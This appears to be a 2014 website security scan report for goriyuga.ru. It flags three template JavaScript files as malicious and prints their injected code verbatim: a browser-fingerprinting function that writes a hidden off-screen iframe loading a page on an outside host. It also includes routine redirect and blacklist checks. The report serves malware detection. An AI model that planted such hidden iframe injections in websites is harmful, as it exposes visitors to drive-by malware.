Scanned pages/files
Request | Server response | Status |
http://www.goriyuga.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 05 Sep 2014 18:05:21 GMT Location: http://goriyuga.ru/ Server: nginx/1.4.7 Content-Length: 0 Content-Type: text/html Set-Cookie: cae5bace83ee60d3e4cd8808af1047a6=fd0f62a386006e0d7386a043cf3f9661; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://goriyuga.ru/ | 200 OK Content-Length: 43007 Content-Type: text/html | clean |
http://goriyuga.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 592 Content-Type: application/x-javascript | clean |
http://www.goriyuga.ru/media/system/js/core.js | 200 OK Content-Length: 5384 Content-Type: application/x-javascript | clean |
http://www.goriyuga.ru/media/system/js/caption.js | 200 OK Content-Length: 1329 Content-Type: application/x-javascript | clean |
http://www.goriyuga.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 599 Content-Type: application/x-javascript | clean |
http://www.goriyuga.ru/templates/full_screen_4/lib/js/jquery-162.js | 200 OK Content-Length: 592 Content-Type: application/x-javascript | clean |
http://www.goriyuga.ru/templates/full_screen_4/lib/js/jquery.easing.min.js | 200 OK Content-Length: 592 Content-Type: application/x-javascript | clean |
http://www.goriyuga.ru/templates/full_screen_4/lib/js/supersized.3.2.1.js | 200 OK Content-Length: 37941 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://doigation.cafecomacucar.com.br/playmenow15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); slide_links : 1, thumb_links : 1, show_bottombar : 1, show_prevnextbutton : 1, show_slidecounter : 0, show_imagetitle : 1, show_playbutton : 1, show_progressbar : 1, thumbnail_navigation : 0 }; jQuery.fn.supersized = function(options){ return this.each(function(){ (new jQuery.supersized(options)); }); }; })(jQuery); Antivirus reports:
| ||
http://www.goriyuga.ru/templates/full_screen_4/lib/js/theme/supersized.shutter.js | 200 OK Content-Length: 12530 Content-Type: application/x-javascript | clean |
http://www.goriyuga.ru/templates/full_screen_4/lib/js/UvumiDropdown.js | 200 OK Content-Length: 5930 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://doigation.cafecomacucar.com.br/playmenow15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); Antivirus reports:
| ||
http://www.goriyuga.ru/templates/full_screen_4/lib/js/tooltips.js | 200 OK Content-Length: 1135 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://doigation.cafecomacucar.com.br/playmenow15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); var content = element.get('title').split('::'); element.store('tip:title', content[0]); element.store('tip:text', content[1]); }); var tipz = new Tips('.tips',{ className: 'tips', fixed: true, hideDelay: 50, showDelay: 50 }); tipz.addEvents({ 'show': function(tip) { tip.fade('in'); }, 'hide': function(tip) { tip.fade('out'); } }); }); Antivirus reports:
| ||
http://stg.odnoklassniki.ru/share/odkl_share.js | 200 OK Content-Length: 12312 Content-Type: application/x-javascript | clean |
http://vk.com/js/api/share.js?11 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://vk.com/test404page.js | 404 Not Found Content-Length: 410 Content-Type: text/html | clean |
http://vk.com/ | HTTP/1.1 200 OK Cache-Control: no-store Connection: close Date: Fri, 05 Sep 2014 18:05:31 GMT Pragma: no-cache Server: nginx/1.2.4 Content-Length: 16988 Content-Type: text/html; charset=windows-1251 Set-Cookie: remixlang=3; expires=Sat, 05 Sep 2015 15:12:15 GMT; path=/; domain=.vk.com X-Frame-Options: deny X-Powered-By: PHP/3.7744 | clean |
http://vk.com/badbrowser.php | 200 OK Content-Length: 3524 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: goriyuga.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 05 Sep 2014 18:05:21 GMT
Pragma: no-cache
Server: nginx/1.4.7
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: cae5bace83ee60d3e4cd8808af1047a6=8ef6380e6b06139cf36449c381f9fa9a; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: goriyuga.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 05 Sep 2014 18:05:21 GMT
Pragma: no-cache
Server: nginx/1.4.7
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: cae5bace83ee60d3e4cd8808af1047a6=8ef6380e6b06139cf36449c381f9fa9a; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: goriyuga.ru
Referer: http://www.google.com/search?q=goriyuga.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: goriyuga.ru
Referer: http://www.google.com/search?q=goriyuga.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=goriyuga.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://goriyuga.ru/
Result: goriyuga.ru is not infected or malware details are not published yet.
Result: goriyuga.ru is not infected or malware details are not published yet.